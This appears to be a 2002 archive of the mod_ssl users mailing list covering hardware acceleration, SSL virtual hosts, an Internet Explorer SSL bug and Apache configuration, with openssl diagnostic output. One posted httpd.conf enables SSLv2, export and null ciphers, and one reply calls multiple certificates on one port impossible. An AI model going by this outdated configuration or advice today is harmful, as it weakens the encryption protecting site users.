RE: SSL Hardware acceleration questions . . . Fairly easy. For those hardware accelerators which are supported by the OpenSSL engine version, all you need to do is to compile modSSL with the engine version of OpenSSL (present as a separate version of OpenSSL from OpenSSL 0.9.6 on), and include a line in httpd.conf setting SSLCryptoDevice to the engine you wish to use. I've set this up on Solaris, HP UX, AIX, Linux, and FreeBSD. Lynn Gazis -----Original Message----- From: mike.innes@Oneaccount.com [mailto:mike.innes@Oneaccount.com] Sent: Thursday, March 07, 2002 9:37 AM To: modssl-users@modssl.org Subject: SSL Hardware acceleration questions . . . Dear all, Has anyone had any experience with hardware acceleration? specifically: How easy is it to get MOD_SSL to be configured with hardware SSL cards (any cards to avoid/recommend). We have Sun hardware (so Sun/Sonicwall ?) Does anything need to be recompiled? which versions of OpenSSL are supported etc. Any specific experiences with iAS would be excellent. What are the performance advantages? Anything tio watch out for? TIA Mikey All telephone calls are recorded and may be monitored. E-mail communication is not secure and may be intercepted by a third party. This message is confidential to the intended addressee. If you are not the intended addressee, please inform us immediately and then delete this message. Virgin One account does not accept responsibility for changes made to this message after it was sent. Although Virgin One account believes this e-mail is free of any virus or other defect which may affect a computer, it is the responsibility of the recipient to ensure that it is virus free and Virgin One account does not accept any responsibility for any loss or damage arising from its use. The Virgin One account is a secured personal bank account with The Royal Bank of Scotland plc administered by Virgin Direct Personal Finance Ltd. It is an Introducer representative only of Virgin Money Personal Financial Service Ltd, which is authorised by the Financial Services Authority for life insurance, pension and unit trust business and represents only the Virgin Money marketing group. Registered office: Waterhouse Square, 138-142 Holborn, London EC1N 2TH, UK. Registered in England no 3414708. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 13:10:04 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA26516; Fri, 8 Mar 2002 13:09:08 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from W2KEXGSWP02.kpnqwest.com id NAA26512; Fri, 8 Mar 2002 13:08:57 +0100 (MET) Received: from ntexghub01.kpnqwest.com (unverified) by W2KEXGSWP02.kpnqwest.com (Content Technologies SMTPRS 4.2.5) with ESMTP id for ; Fri, 8 Mar 2002 13:08:56 +0100 Received: by ntexghub01 with Internet Mail Service (5.5.2653.19) id ; Fri, 8 Mar 2002 13:08:56 +0100 Message-ID: <31FD3FA70CBED31189E700508B640171A170B6@ntexgpra01> From: "Petrydes, Josef" To: "'modssl-users@modssl.org'" Subject: virtual host ?? Date: Fri, 8 Mar 2002 13:17:14 +0100 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) Content-Type: text/plain; charset="iso-8859-2" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Petrydes, Josef" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Helo how to use mod_ssl and more then one name base virtual host in apache with diferent certificates ??? Josef Petrydes ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 13:29:16 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id NAA27346; Fri, 8 Mar 2002 13:28:11 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail3.cableone.net id NAA27317; Fri, 8 Mar 2002 13:27:13 +0100 (MET) Received: from b2v2l7 ([24.116.137.140]) by mail3.cableone.net with Microsoft SMTPSVC(5.5.1877.687.68); Fri, 8 Mar 2002 05:21:09 -0700 Message-ID: <000401c1c69a$fa362440$8c897418@b2v2l7> From: "Joe Pearson" To: References: <31FD3FA70CBED31189E700508B640171A170B6@ntexgpra01> Subject: Re: virtual host ?? Date: Fri, 8 Mar 2002 05:15:45 -0700 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-2" Content-Transfer-Encoding: 7bit X-Priority: 3 X-MSMail-Priority: Normal X-Mailer: Microsoft Outlook Express 6.00.2600.0000 X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000 Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Joe Pearson" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users read the FAQ's ----- Original Message ----- From: "Petrydes, Josef" To: Sent: Friday, March 08, 2002 5:17 AM Subject: virtual host ?? > Helo > > how to use mod_ssl and more then one name base virtual host in apache with > diferent certificates ??? > > Josef Petrydes > ______________________________________________________________________ > Apache Interface to OpenSSL (mod_ssl) www.modssl.org > User Support Mailing List modssl-users@modssl.org > Automated List Manager majordomo@modssl.org ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 15:30:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id PAA03546; Fri, 8 Mar 2002 15:29:14 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from visp.engelschall.com id PAA03517; Fri, 8 Mar 2002 15:28:20 +0100 (MET) Received: by visp.engelschall.com (Postfix, from userid 1005) id DFE304CE729; Fri, 8 Mar 2002 15:28:19 +0100 (CET) Received: by en1.engelschall.com (Sendmail 8.11.0+) for modssl-users@modssl.org id g28E1sb99816; Fri, 8 Mar 2002 15:01:54 +0100 (CET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from mail.be.ubizen.com id OAA00286; Fri, 8 Mar 2002 14:22:51 +0100 (MET) Received: (from local) by mail.be.ubizen.com id OAA20711 for ; Fri, 8 Mar 2002 14:22:50 +0100 Received: from internal via SMTP by batty.netvision.be, id smtpda20705; Fri Mar 8 13:22:48 2002 Received: (qmail 19309 invoked from network); 8 Mar 2002 13:22:47 -0000 Received: from unknown (HELO ubi.be.ubizen.com) (10.0.0.10) by amaya.be.ubizen.com with SMTP; 8 Mar 2002 13:22:46 -0000 Received: from ubizen.com ([10.0.40.56]) by ubi.be.ubizen.com (Netscape Messaging Server 4.1) with ESMTP id GSNP5Y00.T2Q; Fri, 8 Mar 2002 14:22:46 +0100 Message-ID: <3C88B971.D94D6377@ubizen.com> Date: Fri, 08 Mar 2002 14:15:29 +0100 From: "Carl D'Halluin" Organization: Ubizen X-Mailer: Mozilla 4.78 [en] (Windows NT 5.0; U) X-Accept-Language: en MIME-Version: 1.0 To: Christopher Taranto , modssl-users@modssl.org Subject: Re: MSIE broken SSL implementation - problems with mod_ssl / openssl References: <4.3.2.7.2.20020306111756.0474a970@opal.he.net> Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit X-Sanitizer: Out Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Carl D'Halluin" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello Christopher, I looked around on the www and this is our official statement towards our customers. Maybe you can re-use it :-) ---- SSL Problem with certain versions of Internet Explorer / Internet Information Server Certain versions of Internet Explorer contain bugs which cause an incompatibility with all servers having an SSL implementation based on openssl. This includes all Apache webservers and commercial products based on Apache, such as certain Oracle servers, Ubizen DMZ/Shield 3.0 and higher, and many other products. This bug may also affect certain low-crypto distributions of Internet Information Server. Typical error messages experienced by the clients are : Internet Explorer 4.x The server returned an invalid or unrecognized response Internet Explorer 5.x Cannot find server or DNS Error The bugs are caused by a certain Windows dll file, which influences all SSL software on the client machines (or on the IIS server machine). The bug has been around for more than two years, and Microsoft is well aware of this problem. They admit their mistake and have an entire support page dedicated to it, containing a patch. Customers experiencing problems with Internet Explorer when using SSL, are recommended to go to the Microsoft patch page, and to install the fix. The bug and its patch are very clearly documented at http://support.microsoft.com/default.aspx?scid=kb;EN-US;q247367 --- Greetings, Carl Christopher Taranto wrote: > Hi Carl, > > Unfortunately, I have had no luck in tracking down or fixing this > problem. And it's really a big problem in my opinion. I haven't had > enough time to really dig deep on the using openssl to debug the connection > - but I don't really know what I would be looking for > specifically. Fortunately (I guess otherwise I would have a special bald > spot on my head!), I have access to a broken MSIE browser available in my > office that I can use to repeatedly test the server for errors - so there > is a way of trying to find the problem. > > Here is what I have tried: > > openssl s_server -accept 4443 -WWW -cert > /usr/local/apache/conf/ssl.crt/www.condoms.net.crt -key > /usr/local/apache/conf/ssl.key/www.condoms.net.key -state -debug > > When I use this, I get this: > > Using default temp DH parameters > ACCEPT > > and the system waits for me forever - and I am not sure what to put in. > > openssl s_client -connect condoms.net:443 > > CONNECTED(00000003) > depth=0 /C=US/ST=California/L=San Francisco/O=Condom > Sense/OU=DN/CN=www.condoms.net > verify error:num=20:unable to get local issuer certificate > verify return:1 > depth=0 /C=US/ST=California/L=San Francisco/O=Condom > Sense/OU=DN/CN=www.condoms.net > verify error:num=27:certificate not trusted > verify return:1 > depth=0 /C=US/ST=California/L=San Francisco/O=Condom > Sense/OU=DN/CN=www.condoms.net > verify error:num=21:unable to verify the first certificate > verify return:1 > --- > Certificate chain > 0 s:/C=US/ST=California/L=San Francisco/O=Condom > Sense/OU=DN/CN=www.condoms.net > i:/C=US/O=RSA Data Security, Inc./OU=Secure Server Certification Authority > --- > Server certificate > -----BEGIN CERTIFICATE----- > MIID0zCCA0CgAwIBAgIQWlU/retDZkl/izm7HTNt4TANBgkqhkiG9w0BAQQFADBf > MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXUlNBIERhdGEgU2VjdXJpdHksIEluYy4x > LjAsBgNVBAsTJVNlY3VyZSBTZXJ2ZXIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkw > HhcNMDExMTI1MDAwMDAwWhcNMDIxMTI4MjM1OTU5WjB4MQswCQYDVQQGEwJVUzET > MBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxQNU2FuIEZyYW5jaXNjbzEVMBMG > A1UEChQMQ29uZG9tIFNlbnNlMQswCQYDVQQLFAJETjEYMBYGA1UEAxQPd3d3LmNv > bmRvbXMubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC91jpQDQ/gzKLn > u4BLU9rkzp9RPVSTo10u/A7j4nBGHv9oJrswuNxJA5oyNF/naTHX0xNuzWK9LL7A > cK/VwciZIHRCXkQq7Xh4pWbdOjRFBhKRmgt0L2roBggPx+ecaH+sUdNOqQvDq68n > 0iyVCgnNEmGzTfIKiBN5dVJbHNTOnwIDAQABo4IBeTCCAXUwCQYDVR0TBAIwADAL > BgNVHQ8EBAMCBaAwPAYDVR0fBDUwMzAxoC+gLYYraHR0cDovL2NybC52ZXJpc2ln > bi5jb20vUlNBU2VjdXJlU2VydmVyLmNybDCBrAYDVR0gBIGkMIGhMIGeBgtghkgB > hvhFAQcBATCBjjAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cudmVyaXNpZ24uY29t > L0NQUzBiBggrBgEFBQcCAjBWMBUWDlZlcmlTaWduLCBJbmMuMAMCAQEaPVZlcmlT > aWduJ3MgQ1BTIGluY29ycC4gYnkgcmVmZXJlbmNlIGxpYWIuIGx0ZC4gKGMpOTcg > VmVyaVNpZ24wHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMBkGCmCGSAGG > +EUBBg8ECxYJOTI2MDIyNDI3MDQGCCsGAQUFBwEBBCgwJjAkBggrBgEFBQcwAYYY > aHR0cDovL29jc3AudmVyaXNpZ24uY29tMA0GCSqGSIb3DQEBBAUAA34APutHvd2q > aMtbW9hBuGRxGdMie9mgwQgcJC+8TX24M8eg9xKGHdk3u5sURI+I1tNgPRoeeVB0 > TKSgiIHkkYhiCEoQD6aJyRisaVeI4wI8NC1qXSSRcuDDra+52lPUQK9hMIpvzENo > XV0Cj0KnaPVqkfr/4zRrU9UTE370Jqg= > -----END CERTIFICATE----- > subject=/C=US/ST=California/L=San Francisco/O=Condom > Sense/OU=DN/CN=www.condoms.net > issuer=/C=US/O=RSA Data Security, Inc./OU=Secure Server Certification Authority > --- > No client certificate CA names sent > --- > SSL handshake has read 1539 bytes and written 314 bytes > --- > New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA > Server public key is 1024 bit > SSL-Session: > Protocol : TLSv1 > Cipher : EDH-RSA-DES-CBC3-SHA > Session-ID: > 2917B720C36856CC4B2CB63951F9502C449D28905F58FFFF56BF2418AA916E74 > Session-ID-ctx: > Master-Key: > 8DB2F877627C8AEE402DBC388F9ACB72C397637E70C87D43AFD7735E2949827C4AAFA6903D88BA7F3B99AFBFAD5BECE4 > Key-Arg : None > Start Time: 1015525852 > Timeout : 300 (sec) > Verify return code: 21 (unable to verify the first certificate) > --- > > >>Seems like Microsoft deliberately put some broken SSL implementation in > > Seems pretty amazing to me that all of the commercial servers that use > mod_ssl as a base would or wouldn't have this same issue - but I have not > heard of any problems like this with other apache servers like Raven, > Stronghold, etc... Maybe there are problems - but I have not been able to > find any mention of them. And, it seems very convenient to MS in light of > their IIS market share :-) > > My server configuration has already been posted in a previous message (let > me know if you need me to repost it). > > Let me know if any of this makes sense to you or if you have any ideas. > > Sincerely, > > Christopher Taranto > > At 10:52 AM 3/6/02 +0100, you wrote: > >Hello, > > > >I read your entries in a newsgroup. > >I am having exactly the same problem, and I don't want to tell my users > >"upgrade your browser, or use netscape". > > > >I wonder whether you finally found a solution to this embarassing > >problem. > >Seems like Microsoft deliberately put some broken SSL implementation in > >their browser, in order to kill apache / openssl... > > > >Thx > > > >Carl D'Halluin > >Security Engineer. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 16:18:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id QAA06136; Fri, 8 Mar 2002 16:17:07 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from maggotts.rnib.org.uk id QAA06102; Fri, 8 Mar 2002 16:16:18 +0100 (MET) From: John.Airey@rnib.org.uk Received: from pboroweb.rnib.org.uk (pboroweb.rnib.org.uk [194.128.16.145]) by maggotts.rnib.org.uk (8.11.6/8.11.6) with ESMTP id g28FFLv23738; Fri, 8 Mar 2002 15:15:41 GMT Received: by pboroweb.rnib.org.uk with Internet Mail Service (5.5.2650.21) id ; Fri, 8 Mar 2002 15:15:18 -0000 Message-ID: <9B66BBD37D5DD411B8CE00508B69700F02066E5A@pborolocal.rnib.org.uk> To: modssl-users@modssl.org, christopher@tokpela.com Subject: RE: MSIE broken SSL implementation - problems with mod_ssl / open ssl Date: Fri, 8 Mar 2002 15:15:17 -0000 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2650.21) Content-Type: text/plain; charset="iso-8859-1" Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: John.Airey@rnib.org.uk X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Just to throw my bit into the mix, this should also be resolved with SP2 for IE5.01. I believe this kb article predates that. This article was published in December 1999, and last modified 17th September 2001. IE 5.01 SP2 was released on June 19th 2001. (http://www.microsoft.com/windows/ie/downloads/recommended/ie501sp2/default. asp) I can't find a definitive answer on the MS site, like a list of bugs fixed with SP2. IE5.01SP2 is apparently the lowest "supported" browser by MS now. - John Airey Internet systems support officer, ITCSD, Royal National Institute for the Blind, Bakewell Road, Peterborough PE2 6XU, Tel.: +44 (0) 1733 375299 Fax: +44 (0) 1733 370848 John.Airey@rnib.org.uk Evolution - A crutch for scientists who can't handle the existence of the creator. See "disproven scientific theories" and Romans 1:22. >-----Original Message----- >From: Carl D'Halluin [mailto:carl.dhalluin@ubizen.com] >Sent: 08 March 2002 13:15 >To: Christopher Taranto; modssl-users@modssl.org >Subject: Re: MSIE broken SSL implementation - problems with mod_ssl / >openssl > > >Hello Christopher, > >I looked around on the www and this is our official statement >towards our customers. Maybe >you can re-use it :-) > >---- >SSL Problem with certain versions of Internet Explorer / >Internet Information Server > >Certain versions of Internet Explorer contain bugs which >cause an incompatibility with all servers having an SSL >implementation based on openssl. >This includes all Apache webservers and commercial products >based on Apache, such >as certain Oracle servers, Ubizen DMZ/Shield 3.0 and higher, >and many other products. > >This bug may also affect certain low-crypto distributions of >Internet Information Server. > >Typical error messages experienced by the clients are : > Internet Explorer 4.x > The server returned an invalid or unrecognized response > Internet Explorer 5.x > Cannot find server or DNS Error > >The bugs are caused by a certain Windows dll file, which >influences all SSL software >on the client machines (or on the IIS server machine). The bug >has been around for >more than two years, and Microsoft is well aware of this >problem. They admit their mistake >and have an entire support page dedicated to it, containing a patch. > >Customers experiencing problems with Internet Explorer when >using SSL, are recommended >to go to the Microsoft patch page, and to install the fix. > >The bug and its patch are very clearly documented at >http://support.microsoft.com/default.aspx?scid=kb;EN-US;q247367 >--- > >Greetings, > >Carl > > >Christopher Taranto wrote: > >> Hi Carl, >> >> Unfortunately, I have had no luck in tracking down or fixing this >> problem. And it's really a big problem in my opinion. I haven't had >> enough time to really dig deep on the using openssl to debug >the connection >> - but I don't really know what I would be looking for >> specifically. Fortunately (I guess otherwise I would have a >special bald >> spot on my head!), I have access to a broken MSIE browser >available in my >> office that I can use to repeatedly test the server for >errors - so there >> is a way of trying to find the problem. >> >> Here is what I have tried: >> >> openssl s_server -accept 4443 -WWW -cert >> /usr/local/apache/conf/ssl.crt/www.condoms.net.crt -key >> /usr/local/apache/conf/ssl.key/www.condoms.net.key -state -debug >> >> When I use this, I get this: >> >> Using default temp DH parameters >> ACCEPT >> >> and the system waits for me forever - and I am not sure what >to put in. >> >> openssl s_client -connect condoms.net:443 >> >> CONNECTED(00000003) >> depth=0 /C=US/ST=California/L=San Francisco/O=Condom >> Sense/OU=DN/CN=www.condoms.net >> verify error:num=20:unable to get local issuer certificate >> verify return:1 >> depth=0 /C=US/ST=California/L=San Francisco/O=Condom >> Sense/OU=DN/CN=www.condoms.net >> verify error:num=27:certificate not trusted >> verify return:1 >> depth=0 /C=US/ST=California/L=San Francisco/O=Condom >> Sense/OU=DN/CN=www.condoms.net >> verify error:num=21:unable to verify the first certificate >> verify return:1 >> --- >> Certificate chain >> 0 s:/C=US/ST=California/L=San Francisco/O=Condom >> Sense/OU=DN/CN=www.condoms.net >> i:/C=US/O=RSA Data Security, Inc./OU=Secure Server >Certification Authority >> --- >> Server certificate >> -----BEGIN CERTIFICATE----- >> MIID0zCCA0CgAwIBAgIQWlU/retDZkl/izm7HTNt4TANBgkqhkiG9w0BAQQFADBf >> MQswCQYDVQQGEwJVUzEgMB4GA1UEChMXUlNBIERhdGEgU2VjdXJpdHksIEluYy4x >> LjAsBgNVBAsTJVNlY3VyZSBTZXJ2ZXIgQ2VydGlmaWNhdGlvbiBBdXRob3JpdHkw >> HhcNMDExMTI1MDAwMDAwWhcNMDIxMTI4MjM1OTU5WjB4MQswCQYDVQQGEwJVUzET >> MBEGA1UECBMKQ2FsaWZvcm5pYTEWMBQGA1UEBxQNU2FuIEZyYW5jaXNjbzEVMBMG >> A1UEChQMQ29uZG9tIFNlbnNlMQswCQYDVQQLFAJETjEYMBYGA1UEAxQPd3d3LmNv >> bmRvbXMubmV0MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQC91jpQDQ/gzKLn >> u4BLU9rkzp9RPVSTo10u/A7j4nBGHv9oJrswuNxJA5oyNF/naTHX0xNuzWK9LL7A >> cK/VwciZIHRCXkQq7Xh4pWbdOjRFBhKRmgt0L2roBggPx+ecaH+sUdNOqQvDq68n >> 0iyVCgnNEmGzTfIKiBN5dVJbHNTOnwIDAQABo4IBeTCCAXUwCQYDVR0TBAIwADAL >> BgNVHQ8EBAMCBaAwPAYDVR0fBDUwMzAxoC+gLYYraHR0cDovL2NybC52ZXJpc2ln >> bi5jb20vUlNBU2VjdXJlU2VydmVyLmNybDCBrAYDVR0gBIGkMIGhMIGeBgtghkgB >> hvhFAQcBATCBjjAoBggrBgEFBQcCARYcaHR0cHM6Ly93d3cudmVyaXNpZ24uY29t >> L0NQUzBiBggrBgEFBQcCAjBWMBUWDlZlcmlTaWduLCBJbmMuMAMCAQEaPVZlcmlT >> aWduJ3MgQ1BTIGluY29ycC4gYnkgcmVmZXJlbmNlIGxpYWIuIGx0ZC4gKGMpOTcg >> VmVyaVNpZ24wHQYDVR0lBBYwFAYIKwYBBQUHAwEGCCsGAQUFBwMCMBkGCmCGSAGG >> +EUBBg8ECxYJOTI2MDIyNDI3MDQGCCsGAQUFBwEBBCgwJjAkBggrBgEFBQcwAYYY >> aHR0cDovL29jc3AudmVyaXNpZ24uY29tMA0GCSqGSIb3DQEBBAUAA34APutHvd2q >> aMtbW9hBuGRxGdMie9mgwQgcJC+8TX24M8eg9xKGHdk3u5sURI+I1tNgPRoeeVB0 >> TKSgiIHkkYhiCEoQD6aJyRisaVeI4wI8NC1qXSSRcuDDra+52lPUQK9hMIpvzENo >> XV0Cj0KnaPVqkfr/4zRrU9UTE370Jqg= >> -----END CERTIFICATE----- >> subject=/C=US/ST=California/L=San Francisco/O=Condom >> Sense/OU=DN/CN=www.condoms.net >> issuer=/C=US/O=RSA Data Security, Inc./OU=Secure Server >Certification Authority >> --- >> No client certificate CA names sent >> --- >> SSL handshake has read 1539 bytes and written 314 bytes >> --- >> New, TLSv1/SSLv3, Cipher is EDH-RSA-DES-CBC3-SHA >> Server public key is 1024 bit >> SSL-Session: >> Protocol : TLSv1 >> Cipher : EDH-RSA-DES-CBC3-SHA >> Session-ID: >> 2917B720C36856CC4B2CB63951F9502C449D28905F58FFFF56BF2418AA916E74 >> Session-ID-ctx: >> Master-Key: >> >8DB2F877627C8AEE402DBC388F9ACB72C397637E70C87D43AFD7735E2949827 >C4AAFA6903D88BA7F3B99AFBFAD5BECE4 >> Key-Arg : None >> Start Time: 1015525852 >> Timeout : 300 (sec) >> Verify return code: 21 (unable to verify the first certificate) >> --- >> >> >>Seems like Microsoft deliberately put some broken SSL >implementation in >> >> Seems pretty amazing to me that all of the commercial >servers that use >> mod_ssl as a base would or wouldn't have this same issue - >but I have not >> heard of any problems like this with other apache servers like Raven, >> Stronghold, etc... Maybe there are problems - but I have >not been able to >> find any mention of them. And, it seems very convenient to >MS in light of >> their IIS market share :-) >> >> My server configuration has already been posted in a >previous message (let >> me know if you need me to repost it). >> >> Let me know if any of this makes sense to you or if you have >any ideas. >> >> Sincerely, >> >> Christopher Taranto >> >> At 10:52 AM 3/6/02 +0100, you wrote: >> >Hello, >> > >> >I read your entries in a newsgroup. >> >I am having exactly the same problem, and I don't want to >tell my users >> >"upgrade your browser, or use netscape". >> > >> >I wonder whether you finally found a solution to this embarassing >> >problem. >> >Seems like Microsoft deliberately put some broken SSL >implementation in >> >their browser, in order to kill apache / openssl... >> > >> >Thx >> > >> >Carl D'Halluin >> >Security Engineer. >______________________________________________________________________ >Apache Interface to OpenSSL (mod_ssl) www.modssl.org >User Support Mailing List modssl-users@modssl.org >Automated List Manager majordomo@modssl.org > - NOTICE: The information contained in this email and any attachments is confidential and may be legally privileged. If you are not the intended recipient you are hereby notified that you must not use, disclose, distribute, copy, print or rely on this email's content. If you are not the intended recipient, please notify the sender immediately and then delete the email and any attachments from your system. RNIB has made strenuous efforts to ensure that emails and any attachments generated by its staff are free from viruses. However, it cannot accept any responsibility for any viruses which are transmitted. We therefore recommend you scan all attachments. Please note that the statements and views expressed in this email and any attachments are those of the author and do not necessarily represent those of RNIB. RNIB Registered Charity Number: 226227 Website: http://www.rnib.org.uk 14th June 2002 is RNIB Look Loud Day - visit http://www.lookloud.org.uk to find out all about it. ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 17:21:07 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA09527; Fri, 8 Mar 2002 17:20:42 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for from work.fantomas.sk id RAA09459; Fri, 8 Mar 2002 17:19:51 +0100 (MET) Received: (from uhlar@localhost) by work.fantomas.sk (8.9.3/8.9.3/Debian 8.9.3-21) id RAA00825 for modssl-users@modssl.org; Fri, 8 Mar 2002 17:19:48 +0100 Date: Fri, 8 Mar 2002 17:19:48 +0100 From: "Matus \"fantomas\" Uhlar" To: "'modssl-users@modssl.org'" Subject: Re: virtual host ?? Message-ID: <20020308171948.A797@fantomas.sk> Mail-Followup-To: "'modssl-users@modssl.org'" References: <31FD3FA70CBED31189E700508B640171A170B6@ntexgpra01> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.2.5i In-Reply-To: <31FD3FA70CBED31189E700508B640171A170B6@ntexgpra01>; from Josef.Petrydes@KPNQwest.com on Fri, Mar 08, 2002 at 01:17:14PM +0100 X-Echelon: nuclear bomb plane crash terrorist attack djihad spy echelon sucks Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: "Matus \"fantomas\" Uhlar" X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users -> how to use mod_ssl and more then one name base virtual host in apache with -> diferent certificates ??? impossible on the same port. You can use it with one certificate. Or on different ports. Or on different IP's. -- Matus "fantomas" Uhlar, uhlar@fantomas.sk ; http://www.fantomas.sk/ Warning: I don't wish to receive spam to this address. Varovanie: Nezelam si na tuto adresu dostavat akukolvek reklamnu postu. Your mouse has moved. Windows NT will now restart for changes to take to take effect. [OK] ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 17:58:08 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id RAA11065; Fri, 8 Mar 2002 17:57:16 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web14809.mail.yahoo.com id RAA11060; Fri, 8 Mar 2002 17:57:04 +0100 (MET) Message-ID: <20020308165702.99812.qmail@web14809.mail.yahoo.com> Received: from [65.196.216.37] by web14809.mail.yahoo.com via HTTP; Fri, 08 Mar 2002 08:57:02 PST Date: Fri, 8 Mar 2002 08:57:02 -0800 (PST) From: Denis Wang Subject: quesion in DocumentRoot: Linux+Apache1.3 IP-based virtual host+mod_ssl+Tomcat To: modssl-users@modssl.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-modssl-users@modssl.org Precedence: bulk Reply-To: modssl-users@modssl.org X-Sender: Denis Wang X-List-Manager: Majordomo [version 1.94.4] X-List-Name: modssl-users Hello, I am trying to config Apache1.3 to host IP-based virtual hosts in a single daemon with SSL enabled. However, the server always looks for the global DocumentRoot instead of the virtualhost one. Any input will be highly appreciated!!!!!! Details are included below. Best regards, Denis > 1. the whole website accessed from http at port 80 works fine > 2. .jsp files accessed from https at port 443 work fine > 3. .html files acccessed from https at port 443 work fine if in global DocumentRoot > 4. .html files acccessed from https at port 443 NOT work if in virtualhost DocumentRoot > ***************************** > my httpd.conf > ***************************** > > DocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis > ServerName www.mysite.com > VirtualDocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis > > > > > SSLEngine on > SSLCipherSuite ALL:!ADH:!EXPORT56:RC4+RSA:+HIGH:+MEDIUM:+LOW:+SSLv2:+EXP:+eNULL > SSLCertificateFile /etc/httpd/conf/ssl.crt/server.crt > SSLCertificateKeyFile /etc/httpd/conf/ssl.key/server.key > > DocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis > ServerName www.mysite.com > > ErrorLog logs/surfer2sky_error_log > TransferLog logs/surfer2sky_access_log > SetEnvIf User-Agent ".*MSIE.*" \ > nokeepalive ssl-unclean-shutdown \ > downgrade-1.0 force-response-1.0 > CustomLog logs/ssl_request_log \ > "%t %h %{SSL_PROTOCOL}x %{SSL_CIPHER}x \"%r\" %b" > VirtualDocumentRoot /usr/jakarta-tomcat-4.0.1/webapps/denis > > > > > __________________________________________________ > Do You Yahoo!? > Try FREE Yahoo! Mail - the world's greatest free email! > http://mail.yahoo.com/ > __________________________________________________ Do You Yahoo!? Try FREE Yahoo! Mail - the world's greatest free email! http://mail.yahoo.com/ ______________________________________________________________________ Apache Interface to OpenSSL (mod_ssl) www.modssl.org User Support Mailing List modssl-users@modssl.org Automated List Manager majordomo@modssl.org From owner-modssl-users@modssl.org Fri Mar 8 18:06:11 2002 Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L id SAA11571; Fri, 8 Mar 2002 18:05:33 +0100 (MET) Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for from web14803.mail.yahoo.com id SAA11422; Fri, 8 Mar 2002 18:04:32 +0100 (MET) Message-ID: <20020308170431.82777.qmail@web14803.mail.yahoo.com> Received: from [65.196.216.37] by web14803.mail.yahoo.com via HTTP; Fri, 08 Mar 2002 09:04:31 PST Date: Fri, 8 Mar 2002 09:04:31 -0800 (PST) From: Denis Wang Subject: Re: quesion in DocumentRoot: Linux+Apache1.3 IP-based virtual host+mod_ssl+Tomcat To: modssl-users@modssl.org In-Reply-To: <20020308165702.99812.qmail@web14809.mail.yahoo.com> MIME-Version: 